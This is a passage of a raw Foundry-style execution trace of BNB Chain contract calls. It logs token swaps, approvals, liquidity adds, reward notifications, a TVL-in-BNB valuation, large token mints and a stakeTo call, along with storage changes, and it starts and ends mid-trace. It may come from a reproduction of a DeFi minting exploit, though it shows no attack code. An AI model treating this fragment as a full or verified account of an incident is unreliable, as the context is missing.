    │   │   │   ├─ [23155] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::swap(0, 1430825693619362620 [1.43e18], 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 0x)
    │   │   │   │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 1430825693619362620 [1.43e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, to: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, value: 1430825693619362620 [1.43e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x02b45a8bf93f5a6397b6d893a902cdbefc307f15b8d8dd07979cd7acbc0689a9: 0x00000000000000000000000000000000000000000000005f9f6b9cd2216d7d23 → 0x00000000000000000000000000000000000000000000005fb346ed35551c985f
    │   │   │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000c33c3909ca7303516d2a → 0x00000000000000000000000000000000000000000000c33c252e7a0fcfa251ee
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 19244331369616369357237695 [1.924e25]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 921970948017040048411118 [9.219e23]
    │   │   │   │   ├─ emit Sync(reserve0: 19244331369616369357237695 [1.924e25], reserve1: 921970948017040048411118 [9.219e23])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 29940478741613748234 [2.994e19], amount1In: 0, amount0Out: 0, amount1Out: 1430825693619362620 [1.43e18], to: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x60b83d6e00000000c33c3909ca7303516d2a0000000feb23abbe41dd097b8db5 → 0x60b83d6e00000000c33c252e7a0fcfa251ee0000000feb254b4034a5c0812dbf
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [74515] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::swap(3239783955655581581588 [3.239e21], 0, 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x)
    │   │   │   │   ├─ [39983] 0x565b72163f17849832A692A3c5928cc502f46D69::transfer(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 3239783955655581581588 [3.239e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 3239783955655581581588 [3.239e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x0000000000000000000000000000000000000000000000afa108c68ec4d54114
    │   │   │   │   │   │   @ 0xc71980c54edc906eb6d961b50cb2e262dff1c9e4dc52cfb5b2725fd18820576c: 0x00000000000000000000000000000000000000000003509285397758369179ef → 0x000000000000000000000000000000000000000000034fe2e430b0c971bc38db
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4004029817987866627422427 [4.004e24]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1765358960396883236959 [1.765e21]
    │   │   │   │   ├─ emit Sync(reserve0: 4004029817987866627422427 [4.004e24], reserve1: 1765358960396883236959 [1.765e21])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 1430825693619362620 [1.43e18], amount0Out: 3239783955655581581588 [3.239e21], amount1Out: 0, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000000072833e0c139ce9c9cd8bd6ef5fa0fe → 0x00000000000000000000000000000000007283eb2240946e81bf858ba92ab45e
    │   │   │   │   │   @ 10: 0x000000000000000000000000000010ad92e83a221f166571ea90d0354e57e4d3 → 0x000000000000000000000000000010adc826f37c1b129cdf3e00be859b5477f7
    │   │   │   │   │   @ 8: 0x60b83d6800000000005f9f6b9cd2216d7d2300000003509285397758369179ef → 0x60b83d6e00000000005fb346ed35551c985f000000034fe2e430b0c971bc38db
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [29940478741613748234 [2.994e19], 1430825693619362620 [1.43e18], 3239783955655581581588 [3.239e21]]
    │   │   ├─ [2586] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 0)
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   ├─ [594] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::allowance(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [22486] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 29940478741613748234 [2.994e19])
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 29940478741613748234 [2.994e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0 → 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [55531] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(29940478741613748234 [2.994e19], 0, [0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 1622687086 [1.622e9])
    │   │   │   ├─ [893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 19244331369616369357237695 [1.924e25], 921970948017040048411118 [9.219e23], 1622687086 [1.622e9]
    │   │   │   ├─ [5994] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transferFrom(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, 29940478741613748234 [2.994e19])
    │   │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, value: 29940478741613748234 [2.994e19])
    │   │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a → 0
    │   │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a → 0
    │   │   │   │   │   @ 0x26c7faedc5f781c850550111a557f0e9b314f97941ed3fdb3f53337d6f8b55e7: 0x0000000000000000000000000000000000000000000feb254b4034a5c0812dbf → 0x0000000000000000000000000000000000000000000feb26eac2276e7786cdc9
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [40255] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::swap(0, 1430821247012251901 [1.43e18], 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x)
    │   │   │   │   ├─ [25162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 1430821247012251901 [1.43e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 1430821247012251901 [1.43e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdbfaec4d81a00d547bfeab18fbe9bde6f81bfa8825e60f624ae5bdd74ccb4c30: 0 → 0x00000000000000000000000000000000000000000000000013db4c57e53f28fd
    │   │   │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000c33c252e7a0fcfa251ee → 0x00000000000000000000000000000000000000000000c33c11532db7ea6328f1
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 19244361310095110970985929 [1.924e25]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 921969517195793036159217 [9.219e23]
    │   │   │   │   ├─ emit Sync(reserve0: 19244361310095110970985929 [1.924e25], reserve1: 921969517195793036159217 [9.219e23])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 29940478741613748234 [2.994e19], amount1In: 0, amount0Out: 0, amount1Out: 1430821247012251901 [1.43e18], to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x60b83d6e00000000c33c252e7a0fcfa251ee0000000feb254b4034a5c0812dbf → 0x60b83d6e00000000c33c11532db7ea6328f10000000feb26eac2276e7786cdc9
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [29940478741613748234 [2.994e19], 1430821247012251901 [1.43e18]]
    │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300) [staticcall]
    │   │   │   └─ ← [Return] 3239783955655581581588 [3.239e21]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300) [staticcall]
    │   │   │   └─ ← [Return] 1430821247012251901 [1.43e18]
    │   │   ├─ [4858] 0x565b72163f17849832A692A3c5928cc502f46D69::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 0)
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   ├─ [813] 0x565b72163f17849832A692A3c5928cc502f46D69::allowance(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [22658] 0x565b72163f17849832A692A3c5928cc502f46D69::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 3239783955655581581588 [3.239e21])
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 3239783955655581581588 [3.239e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0 → 0x0000000000000000000000000000000000000000000000afa108c68ec4d54114
    │   │   │   └─ ← [Return] true
    │   │   ├─ [7320] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 0)
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdf9c3ba0983d3a6a3c7367f2fe10b1377a00098b5a2de255ca1c3372e1eac368: 0x00000000000000000000000000000000000000000000000000089a180032e040 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [717] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::allowance(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 1430821247012251901 [1.43e18])
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1430821247012251901 [1.43e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdf9c3ba0983d3a6a3c7367f2fe10b1377a00098b5a2de255ca1c3372e1eac368: 0 → 0x00000000000000000000000000000000000000000000000013db4c57e53f28fd
    │   │   │   └─ ← [Return] true
    │   │   ├─ [103503] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x565b72163f17849832A692A3c5928cc502f46D69, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 3239783955655581581588 [3.239e21], 1430821247012251901 [1.43e18], 0, 0, 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 1622687086 [1.622e9])
    │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x565b72163f17849832A692A3c5928cc502f46D69, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c) [staticcall]
    │   │   │   │   └─ ← [Return] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F
    │   │   │   ├─ [893] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 4004029817987866627422427 [4.004e24], 1765358960396883236959 [1.765e21], 1622687086 [1.622e9]
    │   │   │   ├─ [8000] 0x565b72163f17849832A692A3c5928cc502f46D69::transferFrom(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 3239783955655581581588 [3.239e21])
    │   │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, value: 3239783955655581581588 [3.239e21])
    │   │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0x0000000000000000000000000000000000000000000000afa108c68ec4d54114 → 0
    │   │   │   │   │   @ 0xc71980c54edc906eb6d961b50cb2e262dff1c9e4dc52cfb5b2725fd18820576c: 0x000000000000000000000000000000000000000000034fe2e430b0c971bc38db → 0x00000000000000000000000000000000000000000003509285397758369179ef
    │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x0000000000000000000000000000000000000000000000afa108c68ec4d54114 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [4148] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 1428406354561261398 [1.428e18])
    │   │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, value: 1428406354561261398 [1.428e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdf9c3ba0983d3a6a3c7367f2fe10b1377a00098b5a2de255ca1c3372e1eac368: 0x00000000000000000000000000000000000000000000000013db4c57e53f28fd → 0x00000000000000000000000000000000000000000000000000089454f6b649a7
    │   │   │   │   │   @ 0x02b45a8bf93f5a6397b6d893a902cdbefc307f15b8d8dd07979cd7acbc0689a9: 0x00000000000000000000000000000000000000000000005fb346ed35551c985f → 0x00000000000000000000000000000000000000000000005fc719a53843a577b5
    │   │   │   │   │   @ 0xdbfaec4d81a00d547bfeab18fbe9bde6f81bfa8825e60f624ae5bdd74ccb4c30: 0x00000000000000000000000000000000000000000000000013db4c57e53f28fd → 0x00000000000000000000000000000000000000000000000000089454f6b649a7
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [78607] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::mint(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300)
    │   │   │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4007269601943522209004015 [4.007e24]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1766787366751444498357 [1.766e21]
    │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x07d80AE6f36A5E08Dca74cE884A24D39dB9934ed
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x07d80AE6f36A5E08Dca74cE884A24D39dB9934ed, value: 113939133331485363 [1.139e17])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 67542479851940178780 [6.754e19])
    │   │   │   │   ├─ emit Sync(reserve0: 4007269601943522209004015 [4.007e24], reserve1: 1766787366751444498357 [1.766e21])
    │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 3239783955655581581588 [3.239e21], amount1: 1428406354561261398 [1.428e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x000000000000000000000000000000000000000000000003a9571791e7df6b5c
    │   │   │   │   │   @ 11: 0x000000000000000000000000013cf64807ed42c149b1366495813dc85d6a1636 → 0x000000000000000000000000013d7a5657dae8447c9c9bf24eff58b158944efb
    │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000011ad33a10928eeecfbf3 → 0x0000000000000000000000000000000000000000000011b0de8cebc497099a02
    │   │   │   │   │   @ 0x52481eeb4fc6a18a5177a442f3f64a20db882d8cc8cc9f3c36884fd0498d40c0: 0x00000000000000000000000000000000000000000000000e6a3a09a375b77eb7 → 0x00000000000000000000000000000000000000000000000e6bced4ad35f4b16a
    │   │   │   │   │   @ 8: 0x60b83d6e00000000005fb346ed35551c985f000000034fe2e430b0c971bc38db → 0x60b83d6e00000000005fc719a53843a577b500000003509285397758369179ef
    │   │   │   │   └─ ← [Return] 67542479851940178780 [6.754e19]
    │   │   │   └─ ← [Return] 3239783955655581581588 [3.239e21], 1428406354561261398 [1.428e18], 67542479851940178780 [6.754e19]
    │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [9283] 0x565b72163f17849832A692A3c5928cc502f46D69::transfer(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, 0)
    │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300) [staticcall]
    │   │   │   └─ ← [Return] 2414892450990503 [2.414e15]
    │   │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, 2414892450990503 [2.414e15])
    │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, value: 2414892450990503 [2.414e15])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdbfaec4d81a00d547bfeab18fbe9bde6f81bfa8825e60f624ae5bdd74ccb4c30: 0x00000000000000000000000000000000000000000000000000089454f6b649a7 → 0
    │   │   │   │   @ 0x388c98b9a09747a7b891cb5a0ec61f017b1f8d964f029ab2735e3f89e21a693d: 0x000000000000000000000000000000000000000000000000027dfd9e0dbf31c1 → 0x000000000000000000000000000000000000000000000000028691f304757b68
    │   │   │   └─ ← [Return] true
    │   │   ├─ [676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x565b72163f17849832A692A3c5928cc502f46D69, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c) [staticcall]
    │   │   │   └─ ← [Return] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F
    │   │   ├─ [8103] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::transfer(0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d, 67542479851940178780 [6.754e19])
    │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d, value: 67542479851940178780 [6.754e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6a90c3a371e140a6739444228ab687463ec32b9b1d455a969be03b4ea7c95a06: 0x00000000000000000000000000000000000000000000094c067e232c1b64421a → 0x00000000000000000000000000000000000000000000094fafd53abe0343ad76
    │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x000000000000000000000000000000000000000000000003a9571791e7df6b5c → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [33870] 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d::notifyRewardAmount(67542479851940178780 [6.754e19])
    │   │   │   ├─ [537] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::balanceOf(0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d) [staticcall]
    │   │   │   │   └─ ← [Return] 43971261225364311223670 [4.397e22]
    │   │   │   ├─ emit RewardAdded(: 67542479851940178780 [6.754e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000013b7af01e8995c → 0x0000000000000000000000000000000000000000000000000013bf9461b47aaf
    │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000060b83d68 → 0x0000000000000000000000000000000000000000000000000000000060b83d6e
    │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000000e8ea85db883d → 0x0000000000000000000000000000000000000000000000000000e8ec9a579fa9
    │   │   │   │   @ 6: 0x00000000000000000000000000000000000000000000000000000000612ee468 → 0x00000000000000000000000000000000000000000000000000000000612ee46e
    │   │   │   └─ ← [Stop]
    │   │   ├─ [22719] 0x2b16b865249088DC72913056377558ed674D5BfE::tvlInBNB(0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 67542479851940178780 [6.754e19]) [staticcall]
    │   │   │   ├─ [465] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::token0() [staticcall]
    │   │   │   │   └─ ← [Return] 0x565b72163f17849832A692A3c5928cc502f46D69
    │   │   │   ├─ [397] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::token1() [staticcall]
    │   │   │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   │   │   ├─ [439] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 83542893617359589317122 [8.354e22]
    │   │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   │   └─ ← [Return] 4007269601943522209004015 [4.007e24]
    │   │   │   ├─ [7241] 0x75b4b40Fe2A39287433d3C1b3f62A30e37beDDdA::capture() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000001c912bfb390ff
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000002d30e5156be31d66
    │   │   ├─ [25966] 0x565b72163f17849832A692A3c5928cc502f46D69::mint(10420334114419164281600 [1.042e22])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 10420334114419164281600 [1.042e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000006df42e32bbc9e462cacec → 0x00000000000000000000000000000000000000000006e177c65b4862dd1c27ec
    │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00
    │   │   │   └─ ← [Return] 1
    │   │   ├─ [29183] 0x565b72163f17849832A692A3c5928cc502f46D69::transfer(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, 10420334114419164281600 [1.042e22])
    │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, value: 10420334114419164281600 [1.042e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x689efb69e8e429d4b4a0a9f01d92e9cdded8279d7617e5f0ea9f6f31f6304e33: 0 → 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00
    │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [23166] 0x565b72163f17849832A692A3c5928cc502f46D69::mint(1563050117162874642240 [1.563e21])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 1563050117162874642240 [1.563e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000006e177c65b4862dd1c27ec → 0x00000000000000000000000000000000000000000006e1cc8208d08d26f3472c
    │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x000000000000000000000000000000000000000000000054bbad882a49d71f40
    │   │   │   └─ ← [Return] 1
    │   │   ├─ [57956] 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d::stakeTo(1563050117162874642240 [1.563e21], 0xe5F7E3DD9A5612EcCb228392F47b7Ddba8cE4F1a)
    │   │   │   ├─ [19600] 0x565b72163f17849832A692A3c5928cc502f46D69::transferFrom(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d, 1563050117162874642240 [1.563e21])
    │   │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d, value: 1563050117162874642240 [1.563e21])
    │   │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x389D2719a9Bcc29583Db89FD9454ADe9e57CD18d, value: 115792089237316195423570985008687907853269984665640563932519338517546428343165 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6a90c3a371e140a6739444228ab687463ec32b9b1d455a969be03b4ea7c95a06: 0x00000000000000000000000000000000000000000003155e60369f3f9399105d → 0x0000000000000000000000000000000000000000000315b31be42769dd702f9d
    │   │   │   │   │   @ 0xc8e5b14173ae60830066eb2da567232c0ac0882bad59d903689103a885c86288: 0xffffffffffffffffffffffffffffffffffffffffffffe9af9965fdc8b02c42bd → 0xffffffffffffffffffffffffffffffffffffffffffffe95addb8759e6655237d
